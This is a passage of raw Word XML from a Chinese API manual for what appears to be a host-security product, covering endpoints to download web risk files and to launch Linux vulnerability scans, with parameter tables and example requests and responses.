                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348FD9AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D9E910D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="172F52FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F4C57C3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A3493F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303DC2FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6E3A3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBCA680" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3ECFB6D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A56E1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DD728" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3C8BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "ready": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "token": "558a45bedc41046dd1c4342d0e75e269"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28BEC5"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763"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="6993"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C8D7B1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22B80AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19F46975" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="507E639A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BBFEA55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67E03B4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB92F99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ready</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D63EA88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D29371A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7133B629" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0-文件没有准备好，应该</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>轮巡继续</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>调用该接口；1-文件已经准备好；-1-文件下载失败，应提示失败并停止轮询</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A54183F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="204FF548" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36818BBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DAE7E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42FEF6EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>下载的令牌</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17331888" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Toc115166182"/>
      <w:bookmarkStart w:id="216" w:name="web风险文件下载"/>
      <w:bookmarkEnd w:id="214"/>
      <w:r>
        <w:t>Web风险文件下载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="1E40E59C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web风险文件下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB56119" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AC43D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/download/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44272EED"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="21FF67C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E4020FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3DD95B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78C85D49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39AFA2A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="316E8EA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E3D6DAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75A54FA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61ED9049" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71C51975" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79633491" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE49CB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/weakfile/linux/download/5a790f0b7d761b6bc78e1116?token=558a45bedc41046dd1c4342d0e75e269</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C934F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C2985" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421BBD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回rows部分说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D300FDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>文件内容，文件名在header头中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD1BD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc115166183"/>
      <w:bookmarkStart w:id="218" w:name="linux漏洞检测"/>
      <w:bookmarkEnd w:id="206"/>
      <w:bookmarkEnd w:id="216"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linux漏洞检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w14:paraId="28824533" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux漏洞检测和查询，Linux漏洞检测作业管理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A5888D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Toc115166184"/>
      <w:bookmarkStart w:id="220" w:name="linux漏洞检测扫描"/>
      <w:r>
        <w:t>Linux漏洞检测扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="71744696" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux漏洞检测开始执行扫描任务功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4DFA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC3F622"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC65D99"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BC669E" w14:paraId="2BF346D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401C254" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5288BAD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="627508B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EDC7EA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0474D3FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF0E00D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D00C91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D7EF934" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2B3AA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B798520" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F52572" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27AA310D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="472880C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77E085CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="013AE961" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF50871" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7651E5F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EEF1103" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="746C7E6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C17D055" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A01928" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F1F563" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FB959" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5651C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B9C28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
